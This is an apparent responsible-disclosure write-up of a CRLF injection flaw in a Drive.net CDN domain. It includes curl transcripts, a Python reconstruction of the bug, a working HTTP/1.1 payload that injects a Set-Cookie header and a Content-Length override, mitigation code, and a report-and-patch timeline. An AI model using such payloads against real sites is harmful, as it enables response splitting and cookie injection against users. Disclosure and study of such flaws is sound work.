Drive.net CRLF Injection

   

Description

ubuntu@rwx:~$ curl -v 'http://a.d-cd.net/'
> GET / HTTP/1.1
> Host: a.d-cd.net
> User-Agent: curl/7.58.0
> Accept: */*
>
< HTTP/1.1 301 Moved Permanently
< Server: nginx
< Date: Tue, 28 Jan 2020 19:39:09 GMT
< Content-Type: text/html
< Content-Length: 162
< Connection: keep-alive
< Location: https://a.d-cd.net/
< X-Clacks-Overhead: GNU Terry Pratchett
<
<html>
<head><title>301 Moved Permanently</title></head>
<body>
<center><h1>301 Moved Permanently</h1></center>
<hr><center>nginx</center>
</body>
</html>

I was not familiar with the content served by the a.d-cd.net domain and did not analyze the server itself.
Since a.d-cd.net supports HSTS, any plain HTTP request is redirected to HTTPS.

ubuntu@rwx:~$ curl -v 'https://a.d-cd.net/'
* Trying 146.255.192.80...
* TCP_NODELAY set
* Connected to a.d-cd.net (146.255.192.80) port 443 (#0)
* ALPN, offering h2
* ALPN, offering http/1.1
* successfully set certificate verify locations:
* CAfile: /etc/ssl/certs/ca-certificates.crt
CApath: /etc/ssl/certs
* TLSv1.3 (OUT), TLS handshake, Client hello (1):
* TLSv1.3 (IN), TLS handshake, Server hello (2):
* TLSv1.2 (IN), TLS handshake, Certificate (11):
* TLSv1.2 (IN), TLS handshake, Server key exchange (12):
* TLSv1.2 (IN), TLS handshake, Server finished (14):
* TLSv1.2 (OUT), TLS handshake, Client key exchange (16):
* TLSv1.2 (OUT), TLS change cipher, Client hello (1):
* TLSv1.2 (OUT), TLS handshake, Finished (20):
* TLSv1.2 (IN), TLS handshake, Finished (20):
* SSL connection using TLSv1.2 / ECDHE-ECDSA-AES128-GCM-SHA256
* ALPN, server accepted to use h2
* Server certificate:
* subject: C=RU; L=\U041C\U043E\U0441\U043A\U0432\U0430; O=DRIVE LLC; CN=*.d-cd.net
* start date: Nov 29 00:00:00 2019 GMT
* expire date: Feb 1 12:00:00 2022 GMT
* subjectAltName: host "a.d-cd.net" matched cert's "*.d-cd.net"
* issuer: C=US; O=DigiCert Inc; CN=DigiCert SHA2 Secure Server CA
* SSL certificate verify ok.
* Using HTTP2, server supports multi-use
* Connection state changed (HTTP/2 confirmed)
* Copying HTTP/2 data in stream buffer to connection buffer after upgrade: len=0
* Using Stream ID: 1 (easy handle 0x55bd1505f580)
> GET / HTTP/2
> Host: a.d-cd.net
> User-Agent: curl/7.58.0
> Accept: */*
>
* Connection state changed (MAX_CONCURRENT_STREAMS updated)!
< HTTP/2 404
< server: nginx
< date: Tue, 28 Jan 2020 19:40:07 GMT
< content-type: text/html
< content-length: 146
< vary: Accept-Encoding
< x-clacks-overhead: GNU Terry Pratchett
< x-content-type-options: nosniff
< strict-transport-security: max-age=31622400
<
<html>
<head><title>404 Not Found</title></head>
<body>
<center><h1>404 Not Found</h1></center>
<hr><center>nginx</center>
</body>
</html>
* Connection #0 to host a.d-cd.net left intact

Next, I tried an HTTPS request. As the verbose output above shows, the server supports ALPN and offers protocols in the order h2, then http/1.1.

ubuntu@rwx:~$ curl -v https://a.d-cd.net/path
> GET /path HTTP/2
> Host: a.d-cd.net
> User-Agent: curl/7.58.0
> Accept: */*
>
* Connection state changed (MAX_CONCURRENT_STREAMS updated)!
< HTTP/2 404
< server: nginx
< date: Tue, 28 Jan 2020 19:23:01 GMT
< content-length: 0
< x-request-id: 64624053cd48806af4bbbd43aa200100
< x-clacks-overhead: GNU Terry Pratchett
< x-content-type-options: nosniff
< strict-transport-security: max-age=31622400
<
* Connection #0 to host a.d-cd.net left intact

Therefore, curl and any browser that supports ALPN will communicate with this server over HTTP/2.

ubuntu@rwx:~$ curl -v https://a.d-cd.net/path?
* Using HTTP2, server supports multi-use
* Connection state changed (HTTP/2 confirmed)
* Copying HTTP/2 data in stream buffer to connection buffer after upgrade: len=0
* Using Stream ID: 1 (easy handle 0x55600336c580)
> GET /path? HTTP/2
> Host: a.d-cd.net
> User-Agent: curl/7.58.0
> Accept: */*
>
* Connection state changed (MAX_CONCURRENT_STREAMS updated)!
< HTTP/2 301
< server: nginx
< date: Tue, 28 Jan 2020 19:23:20 GMT
< content-type: text/html
< content-length: 162
< location: https://a.d-cd.net/path
< x-clacks-overhead: GNU Terry Pratchett
< x-content-type-options: nosniff
< strict-transport-security: max-age=31622400
<
<html>
<head><title>301 Moved Permanently</title></head>
<body>
<center><h1>301 Moved Permanently</h1></center>
<hr><center>nginx</center>
</body>
</html>
* Connection #0 to host a.d-cd.net left intact

While scanning the server, I noticed something unusual.
Regardless of the content, if the URL contains a query string (e.g. ?a=b), the server strips it and issues another redirect.
I suspect this is done for caching, but I am not sure.

http://a.d-cd.net/ (301) -> https://a.d-cd.net/ (404)
https://a.d-cd.net/ (404)
https://a.d-cd.net/? (301 redirect) -> https://a.d-cd.net/ (404)

Simply put: an HTTP request is redirected to HTTPS,
and an HTTPS request that contains ?... is redirected to the same URL without the ?... part.
When the query part is stripped, the path is URL-decoded before being placed in the redirect response.
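The actual server-side code is unknown, but as a rough sketch in Python, the observed behavior is equivalent to something like the following (the function name, the decoding order, and the string formatting are my assumptions, not the vendor's code):

```python
from urllib.parse import unquote

def build_redirect(raw_path_and_query: str) -> str:
    """Hypothetical reconstruction of the observed rewrite:
    drop everything from '?' onward, percent-decode the rest,
    and emit it verbatim in a Location header."""
    path = raw_path_and_query.split("?", 1)[0]
    decoded = unquote(path)  # %0a becomes a literal newline here
    return f"Location: https://a.d-cd.net{decoded}"

# A request path carrying encoded newlines splits the header:
print(build_redirect("/path%0aheader:%20value%0a?"))
```

Because the percent-decoded path is written into the header unescaped, any %0a (LF) or %0d (CR) in the original path becomes a raw line break inside the response headers.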

ubuntu@rwx:~$ curl -v 'https://a.d-cd.net/path%0aheader:%20value%0a?'
> GET /path%0aheader:%20value%0a? HTTP/2
> Host: a.d-cd.net
> User-Agent: curl/7.58.0
> Accept: */*
>
* Connection state changed (MAX_CONCURRENT_STREAMS updated)!
* http2 error: Invalid HTTP header field was received: frame type: 1, stream: 1, name: [location], value: [https://a.d-cd.net/path
header: value
]
* HTTP/2 stream 1 was not closed cleanly: PROTOCOL_ERROR (err 1)
* Connection #0 to host a.d-cd.net left intact
curl: (92) HTTP/2 stream 1 was not closed cleanly: PROTOCOL_ERROR (err 1)

I assumed this could be exploited for CRLF injection, but the HTTP/2 client validates header metadata.
When I attempted the injection, the client blocked it with a protocol error.
I do not know whether this is intentional, but these HTTP/2 errors prevent the malicious headers from reaching the browser.
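The blocking behavior seen in curl and Chrome matches the HTTP/2 rule (RFC 7540, section 10.3) that a field value containing CR, LF, or NUL must be treated as malformed. A minimal sketch of that check:

```python
def is_valid_h2_field_value(value: bytes) -> bool:
    """HTTP/2 treats CR (0x0d), LF (0x0a), and NUL (0x00) in a
    field value as malformed (RFC 7540, section 10.3); clients
    built on nghttp2, such as curl, reject the whole stream."""
    return not any(b in value for b in (0x00, 0x0a, 0x0d))

print(is_valid_h2_field_value(b"https://a.d-cd.net/path"))                    # True
print(is_valid_h2_field_value(b"https://a.d-cd.net/path\nheader: value\n"))   # False
```

This is why the injected Location value above triggered PROTOCOL_ERROR instead of reaching the browser.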

[Screenshot: HTTP/2 protocol error in Chrome]

The screenshot above shows an HTTP/2 error occurring in the latest version of Chrome when visiting https://a.d-cd.net/%0aa%0a? (browsers that support HTTP/2 behave the same as curl).

These errors work as a mitigation, but they are not sufficient.
Browsers prefer HTTP/2, but the server still supports HTTP/1.1 and earlier.
When a user connects through a proxy that does not support HTTP/2, the browser falls back to HTTP/1.1,
so the header injection succeeds in plain form.

ubuntu@rwx:~$ curl -v --http1.1 'https://a.d-cd.net/path%0aset-cookie:%20evil=123123;%0acontent-length:%20306%0a?'
> GET /path%0aset-cookie:%20evil=123123;%0acontent-length:%20306%0a? HTTP/1.1
> Host: a.d-cd.net
> User-Agent: curl/7.58.0
> Accept: */*
>
< HTTP/1.1 301 Moved Permanently
< Server: nginx
< Date: Tue, 28 Jan 2020 19:34:16 GMT
< Content-Type: text/html
< Content-Length: 162
< Location: https://a.d-cd.net/path
< set-cookie: evil=123123;
< content-length: 306
<
Connection: keep-alive
X-Clacks-Overhead: GNU Terry Pratchett
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31622400

<html>
<head><title>301 Moved Permanently</title></head>
<body>
<center><h1>301 Moved Permanently</h1></center>
<hr><center>nginx</center>
</body>
</html>
* Connection #0 to host a.d-cd.net left intact

For example, I sent the request with curl's --http1.1 option.
You can verify that the injected set-cookie header is received without any error, and the injected content-length pushes the remaining real headers into the response body.

In conclusion, CRLF injection is possible whenever the client uses a proxy or browser that does not support HTTP/2 (ALPN).
Arbitrary headers and content can then be inserted into the response.
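One way to fix this on the server side (a hypothetical sketch, not the vendor's actual patch) is to percent-encode control characters in the path before writing the Location header, so CR/LF can never reach the response as raw bytes:

```python
from urllib.parse import quote

def safe_location(path: str) -> str:
    """Hypothetical fix: re-encode the decoded path so that \r and \n
    (and other reserved bytes) are percent-encoded in the header."""
    # quote() leaves '/' intact but encodes \r, \n, spaces, etc.
    return "https://a.d-cd.net" + quote(path, safe="/")

# The attack payload from above is neutralized:
print(safe_location("/path\nset-cookie: evil=123123;\n"))
```

Alternatively, the server could simply reject any request whose decoded path contains control characters.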


  • 20/01/29 Reported
  • 20/01/31 Patched